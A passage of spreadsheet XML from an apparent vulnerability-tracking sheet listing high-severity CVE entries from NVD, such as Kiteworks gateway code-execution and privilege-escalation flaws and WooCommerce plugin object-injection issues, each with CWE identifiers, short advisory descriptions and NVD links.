      <c r="J273" s="5" t="inlineStr"/>
      <c r="K273" s="5" t="inlineStr"/>
      <c r="L273" s="5" t="inlineStr"/>
      <c r="M273" s="5" t="inlineStr"/>
      <c r="N273" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O273" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P273" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q273" s="5" t="inlineStr"/>
      <c r="R273" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-91</t>
        </is>
      </c>
      <c r="S273" s="5" t="inlineStr">
        <is>
          <t>-A weakness could have allowed an authenticated Kiteworks Email Protection Gateway administrator to write a file outside its intended location and cause the application to execute it, potentially resulting in remote code execution as the underlying service account.</t>
        </is>
      </c>
      <c r="T273" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102116</t>
        </is>
      </c>
    </row>
    <row r="274">
      <c r="A274" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B274" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C274" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102117</t>
        </is>
      </c>
      <c r="D274" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E274" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F274" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G274" s="5" t="inlineStr"/>
      <c r="H274" s="5" t="inlineStr"/>
      <c r="I274" s="5" t="inlineStr"/>
      <c r="J274" s="5" t="inlineStr"/>
      <c r="K274" s="5" t="inlineStr"/>
      <c r="L274" s="5" t="inlineStr"/>
      <c r="M274" s="5" t="inlineStr"/>
      <c r="N274" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O274" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P274" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q274" s="5" t="inlineStr"/>
      <c r="R274" s="5" t="inlineStr">
        <is>
          <t>CWE-807, CWE-940</t>
        </is>
      </c>
      <c r="S274" s="5" t="inlineStr">
        <is>
          <t>On deployments where the remote-support capability is licensed and enabled, an authenticated System Administrator who also possessed the key protecting the submitted data could redirect the underlying system's outbound support connection to a destination of their choosing. That destination could then have operating-system commands executed on the node and receive their output, potentially resulting in remote code execution with the privileges of a local service account.</t>
        </is>
      </c>
      <c r="T274" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102117</t>
        </is>
      </c>
    </row>
    <row r="275">
      <c r="A275" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B275" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C275" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102119</t>
        </is>
      </c>
      <c r="D275" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E275" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F275" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G275" s="5" t="inlineStr"/>
      <c r="H275" s="5" t="inlineStr"/>
      <c r="I275" s="5" t="inlineStr"/>
      <c r="J275" s="5" t="inlineStr"/>
      <c r="K275" s="5" t="inlineStr"/>
      <c r="L275" s="5" t="inlineStr"/>
      <c r="M275" s="5" t="inlineStr"/>
      <c r="N275" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O275" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P275" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q275" s="5" t="inlineStr"/>
      <c r="R275" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S275" s="5" t="inlineStr">
        <is>
          <t>A path traversal weakness in an optional, non-default administrative feature allowed an authenticated administrator to move files to unintended locations outside the feature's designated directory. This could potentially be leveraged to execute arbitrary code on the underlying system.</t>
        </is>
      </c>
      <c r="T275" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102119</t>
        </is>
      </c>
    </row>
    <row r="276">
      <c r="A276" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B276" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C276" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102129</t>
        </is>
      </c>
      <c r="D276" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E276" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F276" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G276" s="5" t="inlineStr"/>
      <c r="H276" s="5" t="inlineStr"/>
      <c r="I276" s="5" t="inlineStr"/>
      <c r="J276" s="5" t="inlineStr"/>
      <c r="K276" s="5" t="inlineStr"/>
      <c r="L276" s="5" t="inlineStr"/>
      <c r="M276" s="5" t="inlineStr"/>
      <c r="N276" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O276" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P276" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q276" s="5" t="inlineStr"/>
      <c r="R276" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="S276" s="5" t="inlineStr">
        <is>
          <t>A user-provisioning interface in Kiteworks Core did not verify that the requesting administrator was entitled to grant the role being assigned. An administrator whose delegated permissions covered role changes alone could therefore raise an account to full system-administrator privileges.</t>
        </is>
      </c>
      <c r="T276" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102129</t>
        </is>
      </c>
    </row>
    <row r="277">
      <c r="A277" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B277" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C277" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102130</t>
        </is>
      </c>
      <c r="D277" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E277" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F277" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G277" s="5" t="inlineStr"/>
      <c r="H277" s="5" t="inlineStr"/>
      <c r="I277" s="5" t="inlineStr"/>
      <c r="J277" s="5" t="inlineStr"/>
      <c r="K277" s="5" t="inlineStr"/>
      <c r="L277" s="5" t="inlineStr"/>
      <c r="M277" s="5" t="inlineStr"/>
      <c r="N277" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O277" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P277" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q277" s="5" t="inlineStr"/>
      <c r="R277" s="5" t="inlineStr">
        <is>
          <t>CWE-434, CWE-94</t>
        </is>
      </c>
      <c r="S277" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Email Protection Gateway did not sufficiently validate the content of an uploaded backup, and allowed an administrator to influence how the application loaded it. An authenticated administrator could potentially use this to execute arbitrary code on the gateway as the underlying service account.</t>
        </is>
      </c>
      <c r="T277" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102130</t>
        </is>
      </c>
    </row>
    <row r="278">
      <c r="A278" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B278" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C278" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102131</t>
        </is>
      </c>
      <c r="D278" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E278" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F278" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G278" s="5" t="inlineStr"/>
      <c r="H278" s="5" t="inlineStr"/>
      <c r="I278" s="5" t="inlineStr"/>
      <c r="J278" s="5" t="inlineStr"/>
      <c r="K278" s="5" t="inlineStr"/>
      <c r="L278" s="5" t="inlineStr"/>
      <c r="M278" s="5" t="inlineStr"/>
      <c r="N278" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O278" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P278" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q278" s="5" t="inlineStr"/>
      <c r="R278" s="5" t="inlineStr">
        <is>
          <t>CWE-178, CWE-94</t>
        </is>
      </c>
      <c r="S278" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Email Protection Gateway rejected certain configuration settings, but its validation did not recognize every form in which they could be supplied. An authenticated administrator could potentially use an unrecognized form to have a file of their choosing written to the gateway and executed, resulting in code execution as the gateway service account.</t>
        </is>
      </c>
      <c r="T278" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102131</t>
        </is>
      </c>
    </row>
    <row r="279">
      <c r="A279" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B279" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C279" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102132</t>
        </is>
      </c>
      <c r="D279" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E279" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F279" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G279" s="5" t="inlineStr"/>
      <c r="H279" s="5" t="inlineStr"/>
      <c r="I279" s="5" t="inlineStr"/>
      <c r="J279" s="5" t="inlineStr"/>
      <c r="K279" s="5" t="inlineStr"/>
      <c r="L279" s="5" t="inlineStr"/>
      <c r="M279" s="5" t="inlineStr"/>
      <c r="N279" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O279" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P279" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q279" s="5" t="inlineStr"/>
      <c r="R279" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S279" s="5" t="inlineStr">
        <is>
          <t>An administrative import function in Kiteworks Core did not verify that the requesting administrator was entitled to create the privileged integration credential being imported. A delegated administrator holding a single narrowly scoped administrative permission could therefore obtain full system administrator privileges, without any action by an existing system administrator.</t>
        </is>
      </c>
      <c r="T279" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102132</t>
        </is>
      </c>
    </row>
    <row r="280">
      <c r="A280" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B280" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C280" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102142</t>
        </is>
      </c>
      <c r="D280" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E280" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F280" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G280" s="5" t="inlineStr"/>
      <c r="H280" s="5" t="inlineStr"/>
      <c r="I280" s="5" t="inlineStr"/>
      <c r="J280" s="5" t="inlineStr">
        <is>
          <t>express, gin</t>
        </is>
      </c>
      <c r="K280" s="5" t="inlineStr"/>
      <c r="L280" s="5" t="inlineStr"/>
      <c r="M280" s="5" t="inlineStr"/>
      <c r="N280" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O280" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P280" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q280" s="5" t="inlineStr"/>
      <c r="R280" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="S280" s="5" t="inlineStr">
        <is>
          <t>A system notification template on the Kiteworks appliance was rendered by a template engine that evaluated expressions contained in the stored template body. An authenticated System Administrator could potentially store a crafted template that executed operating-system commands on the appliance when the notification was next sent.</t>
        </is>
      </c>
      <c r="T280" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102142</t>
        </is>
      </c>
    </row>
    <row r="281">
      <c r="A281" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B281" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C281" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102150</t>
        </is>
      </c>
      <c r="D281" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E281" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F281" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G281" s="5" t="inlineStr"/>
      <c r="H281" s="5" t="inlineStr"/>
      <c r="I281" s="5" t="inlineStr"/>
      <c r="J281" s="5" t="inlineStr"/>
      <c r="K281" s="5" t="inlineStr"/>
      <c r="L281" s="5" t="inlineStr"/>
      <c r="M281" s="5" t="inlineStr"/>
      <c r="N281" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O281" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P281" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q281" s="5" t="inlineStr"/>
      <c r="R281" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S281" s="5" t="inlineStr">
        <is>
          <t>A function in the Kiteworks Advanced Forms component was reachable without authentication. An unauthenticated attacker could potentially use it to carry out a limited set of internal service operations on the Kiteworks platform; it did not permit access to user accounts, stored files, or form submissions.</t>
        </is>
      </c>
      <c r="T281" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102150</t>
        </is>
      </c>
    </row>
    <row r="282">
      <c r="A282" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B282" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C282" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102392</t>
        </is>
      </c>
      <c r="D282" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E282" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F282" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G282" s="5" t="inlineStr"/>
      <c r="H282" s="5" t="inlineStr"/>
      <c r="I282" s="5" t="inlineStr"/>
      <c r="J282" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K282" s="5" t="inlineStr"/>
      <c r="L282" s="5" t="inlineStr"/>
      <c r="M282" s="5" t="inlineStr"/>
      <c r="N282" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O282" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P282" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q282" s="5" t="inlineStr"/>
      <c r="R282" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S282" s="5" t="inlineStr">
        <is>
          <t>Shop manager PHP Object Injection in Extra Product Options For WooCommerce | Custom Product Addons and Fields &lt;= 3.3.8 versions.</t>
        </is>
      </c>
      <c r="T282" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102392</t>
        </is>
      </c>
    </row>
    <row r="283">
      <c r="A283" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B283" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C283" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103441</t>
        </is>
      </c>
      <c r="D283" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E283" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F283" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G283" s="5" t="inlineStr"/>
      <c r="H283" s="5" t="inlineStr"/>
      <c r="I283" s="5" t="inlineStr"/>
      <c r="J283" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K283" s="5" t="inlineStr"/>
      <c r="L283" s="5" t="inlineStr"/>
      <c r="M283" s="5" t="inlineStr"/>
      <c r="N283" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O283" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P283" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q283" s="5" t="inlineStr"/>
      <c r="R283" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S283" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data vulnerability in The Wikimedia Foundation MediaWiki Wikibase extension allows Leverage Executable Code in Non-Executable Files.
This issue affects MediaWiki Wikibase extension: 1.46, 1.45, and 1.43.</t>
        </is>
      </c>
      <c r="T283" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103441</t>
        </is>
      </c>
    </row>
    <row r="284">
      <c r="A284" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B284" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C284" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103442</t>
        </is>
      </c>
      <c r="D284" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E284" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F284" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G284" s="5" t="inlineStr"/>
      <c r="H284" s="5" t="inlineStr"/>
      <c r="I284" s="5" t="inlineStr"/>
      <c r="J284" s="5" t="inlineStr"/>
      <c r="K284" s="5" t="inlineStr"/>
      <c r="L284" s="5" t="inlineStr"/>
      <c r="M284" s="5" t="inlineStr"/>
      <c r="N284" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O284" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P284" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q284" s="5" t="inlineStr"/>
      <c r="R284" s="5" t="inlineStr">
        <is>
          <t>CWE-15</t>
        </is>
      </c>
      <c r="S284" s="5" t="inlineStr">
        <is>
          <t>External control of system or configuration setting vulnerability in The Wikimedia Foundation MediaWiki CentralAuth extension allows Code Injection.
This issue affects MediaWiki CentralAuth extension: 1.46, 1.45, and 1.43.</t>
        </is>
      </c>
      <c r="T284" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103442</t>
        </is>
      </c>
    </row>
    <row r="285">
      <c r="A285" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B285" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C285" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79625</t>
        </is>
      </c>
      <c r="D285" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E285" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F285" s="5" t="inlineStr">
        <is>
          <t>info@cert.vde.com</t>
        </is>
      </c>
      <c r="G285" s="5" t="inlineStr"/>
      <c r="H285" s="5" t="inlineStr"/>
      <c r="I285" s="5" t="inlineStr"/>
      <c r="J285" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K285" s="5" t="inlineStr"/>
      <c r="L285" s="5" t="inlineStr"/>
      <c r="M285" s="5" t="inlineStr"/>
      <c r="N285" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O285" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P285" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q285" s="5" t="inlineStr"/>
      <c r="R285" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="S285" s="5" t="inlineStr">
        <is>
          <t>Affected products do not properly synchronize access to their monitoring functionality. When multiple clients send concurrent requests, this may lead to incorrect reads or writes, or to corruption of internal memory structures. An authenticated remote attacker with monitoring access can exploit this issue to cause incorrect data processing or a denial-of-service condition.</t>
        </is>
      </c>
      <c r="T285" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79625</t>
        </is>
      </c>
    </row>
    <row r="286">
      <c r="A286" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B286" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C286" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85679</t>
        </is>
      </c>
      <c r="D286" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E286" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F286" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G286" s="5" t="inlineStr"/>
      <c r="H286" s="5" t="inlineStr"/>
      <c r="I286" s="5" t="inlineStr"/>
      <c r="J286" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K286" s="5" t="inlineStr"/>
      <c r="L286" s="5" t="inlineStr"/>
      <c r="M286" s="5" t="inlineStr"/>
      <c r="N286" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O286" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P286" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q286" s="5" t="inlineStr"/>
      <c r="R286" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S286" s="5" t="inlineStr">
        <is>
          <t>The Extendify plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'styles.blocks' Block Type Key in all versions up to, and including, 3.1.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This is possible because registerIncoming() is hooked on rest_request_before_callbacks and runs before WordPress evaluates the route's permission_callback, meaning any unauthenticated POST, PUT, or PATCH request to a /wp/v2/global-styles route can trigger the vulnerable code path.</t>
        </is>
      </c>
      <c r="T286" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85679</t>
        </is>
      </c>
    </row>
    <row r="287">
      <c r="A287" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B287" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C287" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93624</t>
        </is>
      </c>
      <c r="D287" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E287" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F287" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G287" s="5" t="inlineStr"/>
      <c r="H287" s="5" t="inlineStr"/>
      <c r="I287" s="5" t="inlineStr"/>
      <c r="J287" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K287" s="5" t="inlineStr"/>
      <c r="L287" s="5" t="inlineStr"/>
      <c r="M287" s="5" t="inlineStr"/>
      <c r="N287" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O287" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P287" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q287" s="5" t="inlineStr"/>
      <c r="R287" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S287" s="5" t="inlineStr">
        <is>
          <t>Shop manager PHP Object Injection in Music Player for WooCommerce &lt;= 1.9.1 versions.</t>
        </is>
      </c>
      <c r="T287" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93624</t>
        </is>
      </c>
    </row>
    <row r="288">
      <c r="A288" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B288" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C288" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93651</t>
        </is>
      </c>
      <c r="D288" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E288" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F288" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G288" s="5" t="inlineStr"/>
      <c r="H288" s="5" t="inlineStr"/>
      <c r="I288" s="5" t="inlineStr"/>
      <c r="J288" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K288" s="5" t="inlineStr"/>
      <c r="L288" s="5" t="inlineStr"/>
      <c r="M288" s="5" t="inlineStr"/>
      <c r="N288" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O288" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P288" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q288" s="5" t="inlineStr"/>
      <c r="R288" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S288" s="5" t="inlineStr">
        <is>
          <t>Author PHP Object Injection in Minimum and Maximum Quantity for WooCommerce &lt;= 2.1.2 versions.</t>
        </is>
      </c>
      <c r="T288" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93651</t>
        </is>
      </c>
    </row>
    <row r="289">
      <c r="A289" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B289" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C289" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93771</t>
        </is>
      </c>
      <c r="D289" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E289" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F289" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G289" s="5" t="inlineStr"/>
      <c r="H289" s="5" t="inlineStr"/>
      <c r="I289" s="5" t="inlineStr"/>
      <c r="J289" s="5" t="inlineStr">
        <is>
          <t>php, go, hp</t>
        </is>
      </c>
      <c r="K289" s="5" t="inlineStr"/>
      <c r="L289" s="5" t="inlineStr"/>
      <c r="M289" s="5" t="inlineStr"/>
      <c r="N289" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O289" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P289" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q289" s="5" t="inlineStr"/>
      <c r="R289" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S289" s="5" t="inlineStr">
        <is>
          <t>Shop manager PHP Object Injection in Cost of Goods for WooCommerce &lt;= 3.5.2 versions.</t>
        </is>
      </c>
      <c r="T289" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93771</t>
        </is>
